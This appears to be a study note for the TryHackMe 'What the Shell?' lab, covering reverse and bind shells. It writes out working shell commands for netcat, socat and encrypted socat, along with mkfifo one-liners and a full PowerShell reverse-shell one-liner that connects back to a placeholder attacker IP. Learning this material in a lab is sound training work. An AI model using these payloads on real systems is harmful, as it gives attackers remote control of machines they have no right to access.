📕
writeups
  • Introduction
  • Try Hack Me
    • Walkthroughs
      • Core Windows Processes
      • Linux: Local Enumeration
      • Network services
      • Network services 2
      • What the Shell?
      • Common Linux Privesc
      • Hashing - Crypto 101
    • Challanges (CTF)
      • Basic pentesting
      • tomghost
      • VulnNet
  • hack the box
    • Easy machines
    • Medium machines
Powered by GitBook
On this page
  • Task 2: Tools
  • Task 3: Types of shell
  • Task 4: Netcat
  • Task 5: Netcat shell stabilization
  • Task 6: Socat
  • Task 7: socat encrypted shell
  • Task 8: Common shell payloads
  • Task 9: msfvenom

Was this helpful?

  1. Try Hack Me
  2. Walkthroughs

What the Shell?

An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.

PreviousNetwork services 2NextCommon Linux Privesc

Last updated 4 years ago

Was this helpful?

This walkthrough from describes some technique about getting the shell. Here I not only share the answer but this is also a 'digest' type note from that room. This will help to quickly view those techniques.

Task 2: Tools

Useful tools for shell:

  • Netcat

  • Socat

  • Metasploit - multi/handler: auxiliary/multi/handler used to receive reverse shells

  • msfvenom

Task 3: Types of shell

  1. Reverse shells are when the target is forced to execute code that connects back to your computer.

  2. Bind shells are when the code executed on the target is used to start a listener attached to a shell directly on the target.

Shells can be either interactive or non-interactive.

Task 4: Netcat

Netcat is the most basic tool in a pentester's toolkit when it comes to any kind of networking.

  1. Reverse shell : nc -lvnp <port-number>

  2. Bind shell: nc <target-ip> <chosen-port>

-lvnp means

  • -l is used to tell netcat that this will be a listener

  • -v is used to request a verbose output

  • -n tells netcat not to resolve host names or use DNS. Explaining this is outwith the scope of the room.

  • -p indicates that the port specification will follow.

Task 5: Netcat shell stabilization

There are many ways to stabilize netcat shells on Linux systems.

  • Technique 1: Python

    • To spawn a better featured bash shell: python -c 'import pty;pty.spawn("/bin/bash")'

    • Some targets may need the version of Python specified.

    • export TERM=xterm - this will give us access to term commands such as clear

    • Finally, in our own terminal we use stty raw -echo; fg

      • it turns off our own terminal echo

      • it foregrounds the shell

  • Technique 2: rlwrap

    • This technique is particularly useful when dealing with Windows shells

    • Listener command: rlwrap nc -lvnp <port>

  • Technique 3: socat

    • this technique is limited to Linux targets

Task 6: Socat

Reverse shell :

  • Basic syntax: socat TCP-L:<port> - this is similar to nc -lvnp <port>

  • Command to connect back

    • Windows: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

    • Linux: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

Bind shell:

  • Command to connect

    • Windows: socat TCP-L:<PORT> EXEC:powershell.exe,pipes

    • Linux: socat TCP-L:<PORT> EXEC:"bash -li"

    • Command on our attacking machine to connect to the waiting listener: socat TCP:<TARGET-IP>:<TARGET-PORT> -

    • A more stable and Linux only command: socat TCP-L:<port> FILE:`tty`,raw,echo=0

Task 7: socat encrypted shell

Getting an encrypted reverse shell:

  • First, generate certificate: openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

  • The command above creates a 2048-bit RSA key with a matching cert file - valid for 1 year

  • Now, merge two created files into one: cat shell.key shell.crt > shell.pem

  • Reverse shell listener on attacker machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

  • Execute command on victim machine: socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

Getting an encrypted bind shell:

  • Run in Target machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

  • Attacker machine: socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

Note: Even for windows target, use certificate with listener.

Task 8: Common shell payloads

In recent updates, -e /bin/shell option don't work as it is insecure. So we need to use a special command to execute shell.

  • To create a bind shell:

    • In the Target machine: mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

    • Attacker machine: nc -lvnp <PORT>

  • For a reverse shell:

    • In the Target machine: mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

A standard one liner PowerShell reverse shell code below. We need to replace '<ip>' and <port> here.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Task 9: msfvenom

The standard syntax for msfvenom: msfvenom -p <PAYLOAD> <OPTIONS>

There are 2 type of reverse shell payloads:

  1. Staged: This payload has 2 parts

    1. Stager: This goes to the server and initiate a reverse connection only. It has no payload in it

    2. Reverse shell code: This bulk code is downloaded after an initial connection.

  2. Stageless: The whole reverse shell code gets uploaded to a server for a connection back. These are easy to detect by detection software.

A very good article on socat :

A detail explanation about the command can be found here:

Reverse shell cheat sheet list:

A very good cheat sheet about msfvenom:

Read here
Link
Payloads All The Things
Link here
tryHackMe